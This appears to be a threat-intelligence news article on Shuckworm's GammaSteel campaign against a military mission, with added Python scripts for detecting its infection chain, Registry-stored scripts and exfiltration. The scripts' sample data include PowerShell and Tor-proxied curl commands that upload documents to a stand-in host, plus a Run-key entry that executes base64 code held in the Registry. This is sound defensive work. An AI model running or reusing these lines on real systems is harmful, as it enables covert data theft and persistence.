Shuckworm's New Round of Attacks on an Eastern European Military Mission in 2025
The Russia-linked espionage group Shuckworm continued its cyberattacks against Ukraine and its Western military allies in 2025, using more sophisticated PowerShell-based malware tools and infected removable storage devices as its initial intrusion vector. 2025-4-13 00:45:44 Author: cybersecuritynews.com

Shuckworm Group Uses PowerShell Based GammaSteel Malware in Targeted Attacks

The Russia-linked espionage group Shuckworm has continued its relentless focus on Ukraine into 2025, with new attacks targeting a Western country’s military mission based in Eastern Europe.

This latest campaign, observed from February through March 2025, represents an evolution in the group’s tactics with a shift toward more sophisticated PowerShell-based malware tools that enhance stealth and persistence capabilities.

Shuckworm, also known as Gamaredon or Armageddon, has been active since 2013 and has almost exclusively targeted Ukrainian government, law enforcement, and defense organizations.


The initial infection vector in this campaign appears to be infected removable drives, demonstrating the group’s tactical awareness of potentially air-gapped environments in military settings.

The attackers deployed an updated version of their GammaSteel infostealer, designed to exfiltrate sensitive data from victim networks.

The campaign demonstrates Shuckworm’s move from VBS scripts to predominantly PowerShell-based tools, particularly in later stages of the attack chain.

This tactical shift allows the group to leverage PowerShell for increased obfuscation and provides the capability to store malicious scripts directly in the Windows Registry, reducing their footprint on disk.

Symantec researchers identified a complex, multi-staged attack chain featuring frequent use of obfuscation techniques designed to minimize detection risk.

Analysis of the infection timeline shows that following initial compromise in February, an array of malicious activity occurred on March 1st across multiple machines in the targeted network.

Infection Mechanism and Exfiltration Methods

The attack begins with a malicious LNK file on an external drive, which triggers a chain of events starting with an mshta.exe process executing JavaScript code.

This leads to the execution of heavily obfuscated VBScript files which establish persistence and contact command and control (C&C) servers.
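The chain just described (a LNK on removable media, mshta.exe running inline JavaScript, then a script host executing an obfuscated VBScript) leaves a recognisable parent/child pattern in process-creation telemetry. The following Python is an added example of hunting for that pattern; it is not code from the article or from Symantec. The event records, PIDs, drive letter and paths are constructed for the example, with field names modelled loosely on Sysmon Event ID 1.

```python
"""Flag mshta.exe launches that match the infection chain above.
Added example; the event records below are constructed (field names modelled
loosely on Sysmon Event ID 1) and the PIDs, drive letter and paths are invented."""
import re
from collections import defaultdict

# Constructed sample telemetry: explorer.exe opens a LNK on E:, mshta.exe runs
# inline JavaScript, then wscript.exe executes a VBScript dropped in %TEMP%.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe", "current_dir": r"C:\Users\u"},
    {"pid": 5212, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe javascript:eval("var o=new ActiveXObject(...)")',
     "current_dir": "E:\\"},
    {"pid": 5340, "ppid": 5212, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B //E:vbscript C:\Users\u\AppData\Local\Temp\x7.tmp",
     "current_dir": "E:\\"},
    # An installer running an .hta from Program Files: should not alert.
    {"pid": 6001, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\ExampleVendor\setup.hta"',
     "current_dir": r"C:\Program Files\ExampleVendor"},
]

INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# Heuristic: a working directory on any drive other than C: may be removable
# media; join against device-arrival events for certainty in real telemetry.
NON_SYSTEM_DRIVE = re.compile(r"^[D-Z]:\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_OR_VBS = re.compile(r"\\Temp\\|\.vbs\b|//E:vbscript", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious_mshta(events, min_reasons=2):
    """Return one alert per mshta.exe process showing at least min_reasons
    indicators; requiring two keeps a lone inline-script launch from alerting."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    alerts = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        reasons = []
        if INLINE_SCRIPT.search(e["cmdline"]):
            reasons.append("inline script protocol handler in mshta command line")
        if NON_SYSTEM_DRIVE.match(e.get("current_dir", "")):
            reasons.append("working directory on a non-system drive (possible removable media)")
        for c in children[e["pid"]]:
            if basename(c["image"]) in SCRIPT_HOSTS and TEMP_OR_VBS.search(c["cmdline"]):
                reasons.append(f"child {basename(c['image'])} (pid {c['pid']}) runs a script from a temp path")
        if len(reasons) >= min_reasons:
            alerts.append({"pid": e["pid"], "cmdline": e["cmdline"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_mshta(EVENTS):
        print(f"ALERT pid={a['pid']}: {a['cmdline']}")
        for r in a["reasons"]:
            print("  -", r)
```

Run against the constructed events, only the mshta.exe process launched from E: with inline JavaScript and a wscript.exe child alerts; the installer's .hta launch from Program Files scores zero. The non-system-drive check is deliberately a weak signal on its own, which is why the function requires two indicators before alerting.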

The following snippet shows how the malware uses PowerShell to collect system information, in this case the dimensions of the primary monitor:

# Load the Windows Forms assembly so the script can query display information
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
# Size (in pixels) of the primary monitor
$ScreenBounds = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize;
# The trailing "+ 1-1" is a no-op included for obfuscation; $w and $h are simply the width and height
$w = $ScreenBounds."Width" + 1-1;
$h = $ScreenBounds."Height" + 1-1;

The malware stores its components across multiple Registry values, preventing easy detection and removal.
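Scripts parked in Registry values leave two things for a defender to look for: an autorun entry whose command line reads another Registry value and evaluates it, and unusually large string values that decode to script text. The Python below is an added example that applies both checks to a .reg export; it is not the article's or Symantec's tooling, and the export text, key and value names (ExampleVendor, SysHelper, Payload) and the encoded script body are constructed for the example.

```python
"""Hunt a .reg export for script code parked in the Registry: an autorun entry
whose command loads another registry value, and large base64 blobs that decode
to PowerShell. Added example; the export text, key names and payload below are
constructed."""
import base64
import re

# Constructed stand-in for a stored script body (modelled on the monitor-size
# snippet quoted in the article), UTF-16LE encoded and base64'd the way
# [Convert]::FromBase64String + [Text.Encoding]::Unicode.GetString consume it.
SCRIPT_BODY = ("[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');"
               "$b=[System.Windows.Forms.SystemInformation]::PrimaryMonitorSize;") * 6
ENCODED = base64.b64encode(SCRIPT_BODY.encode("utf-16-le")).decode()

# Constructed .reg export: one benign Run entry, one that pulls its code from
# a second key, and the value holding that code.
REG_EXPORT = rf'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"SysHelper"="powershell -w hidden -c \"iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\ExampleVendor').Payload)))\""

[HKEY_CURRENT_USER\Software\ExampleVendor]
"Payload"="{ENCODED}"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def parse_reg(text):
    """Return (key, name, data) for the REG_SZ values in a .reg export,
    undoing the export format's backslash escaping."""
    key, values = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            name, data = (re.sub(r"\\(.)", r"\1", g) for g in m.groups())
            values.append((key, name, data))
    return values


AUTORUN_KEYS = (r"\currentversion\run", r"\currentversion\runonce")
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.IGNORECASE)
REG_READ = re.compile(r"\b(gp|Get-ItemProperty|GetValue|HKCU:|HKLM:|HKEY_)", re.IGNORECASE)
BASE64_ONLY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PS_MARKERS = ("[system.", "$", "iex", "invoke-expression", "frombase64string")


def find_registry_resident_scripts(reg_text, min_blob_len=400):
    """Return findings for autorun entries that load code from the Registry and
    for large base64 values that decode (as UTF-16LE) to PowerShell-like text."""
    findings = []
    for key, name, data in parse_reg(reg_text):
        if key.lower().endswith(AUTORUN_KEYS) and SCRIPT_HOST.search(data) and REG_READ.search(data):
            findings.append({"key": key, "value": name, "preview": data[:60],
                             "reason": "autorun launches a script host that loads code from another registry value"})
            continue
        if len(data) >= min_blob_len and BASE64_ONLY.match(data):
            decoded = base64.b64decode(data).decode("utf-16-le", errors="ignore")
            if any(marker in decoded.lower() for marker in PS_MARKERS):
                findings.append({"key": key, "value": name, "preview": decoded[:60],
                                 "reason": "large base64 blob that decodes to PowerShell-like text"})
    return findings


if __name__ == "__main__":
    for f in find_registry_resident_scripts(REG_EXPORT):
        print(f"{f['key']}\\{f['value']}: {f['reason']}\n    {f['preview']}...")
```

The same checks can be run directly against a live hive with Get-ItemProperty instead of a .reg export; the export form is used here so the example runs offline on any platform. Lowering min_blob_len catches smaller stagers at the cost of more noise from legitimately long values such as serialized settings.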

For data exfiltration, GammaSteel employs multiple methods including PowerShell web requests to Cloudflare-based domains, and as a fallback, cURL with Tor network proxying to mask the origin IP.

The malware specifically targets files with extensions like .doc, .docx, .xls, .pdf, and other document formats, while avoiding system folders containing strings like “windows” or “appdata.”
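Both exfiltration paths described above (a PowerShell web request that sends data, and curl routed through a local Tor SOCKS proxy) are visible in process command lines, and the document extensions the malware harvests give a second signal to correlate. The Python below is an added example of that command-line triage; it is not code from the article or from Symantec. The sample command lines are constructed, and placeholder.example stands in for the attacker-controlled host, which the article does not name.

```python
"""Flag command lines matching GammaSteel's two exfiltration paths: PowerShell
web requests that send data, and curl routed through a local Tor SOCKS proxy.
Added example; the command lines and the placeholder.example host are
constructed."""
import re

# Constructed process command lines: two exfiltration attempts, a benign
# curl download, and a PowerShell download that only writes a file.
SAMPLE_CMDLINES = [
    r'powershell -w hidden -c "Invoke-WebRequest -Uri https://placeholder.example/u -Method POST -InFile C:\Users\u\Documents\report.docx"',
    r'curl.exe --socks5-hostname 127.0.0.1:9050 -F "file=@C:\Users\u\Documents\plan.pdf" http://placeholder.example/u',
    r'curl.exe -s https://placeholder.example/version.json',
    r'powershell -c "Invoke-WebRequest https://placeholder.example/setup.msi -OutFile C:\Temp\setup.msi"',
]

PROXY_ARG = re.compile(r"(?:-x|--proxy|--socks5(?:-hostname)?|--preproxy)\s+(\S+)", re.IGNORECASE)
# Tor's default SOCKS listeners: 9050 (tor daemon) and 9150 (Tor Browser).
TOR_HINT = re.compile(r"socks5h?://|:(9050|9150)\b", re.IGNORECASE)
CURL_UPLOAD = re.compile(r'(?:-F|--form|-d|--data(?:-binary|-raw)?)\s+"?\S*@|(?:-T|--upload-file)\s+\S+',
                         re.IGNORECASE)
PS_WEB = re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Net\.WebClient|UploadFile|UploadString|UploadData)\b",
                    re.IGNORECASE)
PS_SENDS = re.compile(r"-Method\s+(POST|PUT)|-InFile\s|-Body\s|\bUpload(File|String|Data)\b", re.IGNORECASE)
# Extensions the article says GammaSteel harvests (plus .xlsx).
DOC_EXT = re.compile(r"\.(docx?|xlsx?|pdf)\b", re.IGNORECASE)


def classify(cmdline):
    """Return the reasons a command line looks like GammaSteel exfiltration;
    an empty list means nothing matched."""
    exe = cmdline.split()[0].rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    reasons = []
    if exe == "curl":
        m = PROXY_ARG.search(cmdline)
        if m and TOR_HINT.search(m.group(1)):
            reasons.append("curl proxied through a local Tor SOCKS port")
        if CURL_UPLOAD.search(cmdline):
            reasons.append("curl sending a file or form body")
    elif exe in ("powershell", "pwsh"):
        if PS_WEB.search(cmdline) and PS_SENDS.search(cmdline):
            reasons.append("PowerShell web request that sends data")
    # Only add the document-type signal when a sending behaviour was seen, so
    # that opening a PDF in a browser does not count.
    if reasons and DOC_EXT.search(cmdline):
        reasons.append("references a document type GammaSteel targets")
    return reasons


def scan(cmdlines):
    """Map index -> reasons for every command line that produced at least one reason."""
    return {i: r for i, c in enumerate(cmdlines) if (r := classify(c))}


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_CMDLINES).items():
        print(f"[{i}] {SAMPLE_CMDLINES[i]}")
        for r in reasons:
            print("   -", r)
```

Because the primary channel uses Cloudflare-fronted domains, destination reputation alone is a weak signal here; the checks above key on behaviour (a POST or file upload from a script host, a SOCKS proxy on Tor's ports) rather than on where the request goes. The download-only PowerShell and curl samples come back clean, which is the point of requiring a sending behaviour before the extension signal counts.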


Source: https://cybersecuritynews.com/shuckworm-group-uses-powershell-based-gammasteel-malware/